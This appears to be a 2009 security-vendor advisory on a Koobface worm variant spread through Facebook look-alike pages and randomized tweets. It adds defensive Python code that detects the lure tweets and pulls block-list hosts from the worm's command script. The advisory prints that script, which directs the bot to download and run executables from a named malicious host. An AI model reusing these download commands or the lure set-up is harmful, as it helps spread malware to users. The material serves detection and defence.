
SonicWALL UTM Research team found a new variant of Koobface worm last week on August 7, 2009. It's packed using UPX.
There are three major enhancements in this new variant of Koobface:
a) Earlier drive-by sites had a page that looked like a YouTube video page, but the new variant has switched to a Facebook video look-alike page.
b) In the past, the message tweeted was "My home video :) "; now they randomize it by appending "LOL", "HA-HA-HA", "OMFG!", etc., so each tweet is unique.
c) The link is also unique, with an appended random number, so it remains unique after URL shortening:
hxxp://uppinorr.se/pub1icm0vies/? -> hxxp://bit.ly/
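The randomized tweet text and the per-tweet random number are both there to defeat exact-match filtering. The following Python snippet is an added example (not code from the SonicWALL write-up) showing how a defender can still classify these tweets and collapse the unique links back to one indicator: it matches the fixed base message plus any combination of the filler tokens named above, and it strips the randomized query string from the lure URL so every variation of the link maps to the same drive-by site. The sample tweets and their random numbers are constructed; the links are shown in their unshortened form (as they would appear after expanding the bit.ly URL).

```python
import re
from urllib.parse import urlsplit, urlunsplit

# Base message used by the earlier variant and the filler tokens the new
# variant appends to make each tweet unique (all taken from the write-up).
BASE_MESSAGE = "My home video :)"
FILLER_TOKENS = ("LOL", "HA-HA-HA", "OMFG!")

# Base message, zero or more filler tokens, then a single link (http or defanged hxxp).
TWEET_RE = re.compile(
    r"^\s*" + re.escape(BASE_MESSAGE)
    + r"(?:\s+(?:" + "|".join(re.escape(t) for t in FILLER_TOKENS) + r"))*"
    + r"\s+(?P<link>h(?:xx|tt)ps?://\S+)\s*$"
)


def classify_tweet(text):
    """Return the embedded link if the tweet matches the Koobface lure pattern, else None."""
    match = TWEET_RE.match(text)
    return match.group("link") if match else None


def normalize_lure_url(url):
    """Drop the query string (the appended random number) and fragment so that
    every per-tweet variation of the link maps to one indicator."""
    parts = urlsplit(url)
    return urlunsplit((parts.scheme, parts.netloc, parts.path, "", ""))


def extract_indicators(tweets):
    """Collect the distinct normalized lure URLs from a batch of tweets."""
    indicators = set()
    for tweet in tweets:
        link = classify_tweet(tweet)
        if link:
            indicators.add(normalize_lure_url(link))
    return sorted(indicators)


# Constructed sample tweets: three lures with different filler tokens and
# random numbers, one old-style lure, one benign message, and one lure using
# a filler token not in the list (shows that the token list must be maintained).
SAMPLE_TWEETS = [
    "My home video :) LOL hxxp://uppinorr.se/pub1icm0vies/?84723",
    "My home video :) HA-HA-HA OMFG! hxxp://uppinorr.se/pub1icm0vies/?10391",
    "My home video :) OMFG! hxxp://uppinorr.se/pub1icm0vies/?5",
    "My home video :) hxxp://uppinorr.se/pub1icm0vies/?7731",
    "Check out my home video https://example.invalid/benign",
    "My home video :) LMAO hxxp://uppinorr.se/pub1icm0vies/?222",
]

if __name__ == "__main__":
    for tweet in SAMPLE_TWEETS:
        print(f"{classify_tweet(tweet)!r:55} <- {tweet}")
    print("indicators:", extract_indicators(SAMPLE_TWEETS))
```

Note that the last sample tweet is not matched because "LMAO" is not one of the filler tokens seen in this variant; a signature built this way has to be updated as the campaign changes its wording, which is exactly why normalizing the link is the more durable indicator.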
The malware performs the following activities upon execution:
#PID=1000
STARTONCEIMG|http://web.reg.md/1/p.jpg
STARTONCE|http://web.reg.md/1/prx.exe
START|http://web.reg.md/1/pp.10.exe
#BLACKLABEL
EXIT
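The block above is a pipe-delimited command script: lines starting with "#" carry a directive (a KEY=VALUE pair or a bare flag), the remaining lines are a command name and a URL separated by "|", and EXIT ends the script. The following Python snippet is an added example (not code from the SonicWALL write-up) that parses this layout and pulls out the URLs and hosts a defender would want to block or hunt for. The script text is copied from the page; the field meanings beyond the visible layout are an assumption of this example.

```python
from urllib.parse import urlsplit

# Command script exactly as listed in the write-up.
KOOBFACE_SCRIPT = """#PID=1000
STARTONCEIMG|http://web.reg.md/1/p.jpg
STARTONCE|http://web.reg.md/1/prx.exe
START|http://web.reg.md/1/pp.10.exe
#BLACKLABEL
EXIT"""


def parse_script(text):
    """Parse the script into directives, (command, url) pairs and a termination flag.

    Layout assumed from the sample: '#KEY=VALUE' or '#FLAG' lines are directives,
    'NAME|URL' lines are commands, 'EXIT' stops parsing. Anything else is
    collected under 'unknown' so that new command types are noticed rather than
    silently dropped.
    """
    result = {"directives": {}, "commands": [], "unknown": [], "terminated": False}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "EXIT":
            result["terminated"] = True
            break  # lines after EXIT are ignored
        if line.startswith("#"):
            key, sep, value = line[1:].partition("=")
            result["directives"][key] = value if sep else True
            continue
        name, sep, arg = line.partition("|")
        if sep and arg.startswith(("http://", "https://")):
            result["commands"].append((name, arg))
        else:
            result["unknown"].append(line)
    return result


def download_urls(parsed):
    """URLs the script instructs the bot to fetch, in script order."""
    return [url for _, url in parsed["commands"]]


def hosts_to_block(parsed):
    """Distinct hosts referenced by the script, for blocklists or proxy log hunting."""
    return sorted({urlsplit(url).netloc for url in download_urls(parsed)})


if __name__ == "__main__":
    parsed = parse_script(KOOBFACE_SCRIPT)
    print("directives:", parsed["directives"])
    for name, url in parsed["commands"]:
        print(f"{name:14} {url}")
    print("hosts:", hosts_to_block(parsed))
    print("terminated:", parsed["terminated"])
```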
This malware is also known as Worm:Win32/Koobface.gen!D, Net-Worm.Win32.Koobface.bgr, and Mal/KoobHeur-A.
SonicWALL Gateway AntiVirus provides protection against this malware via GAV: Koobface.BGR (Worm) signature.
Screenshots of Koobface worm drive-by sites in action can be seen below:
Facebook video page look-alike:
Download of the Koobface worm when user attempts to download flash player:
Page showing unique tweets with shortened malicious link: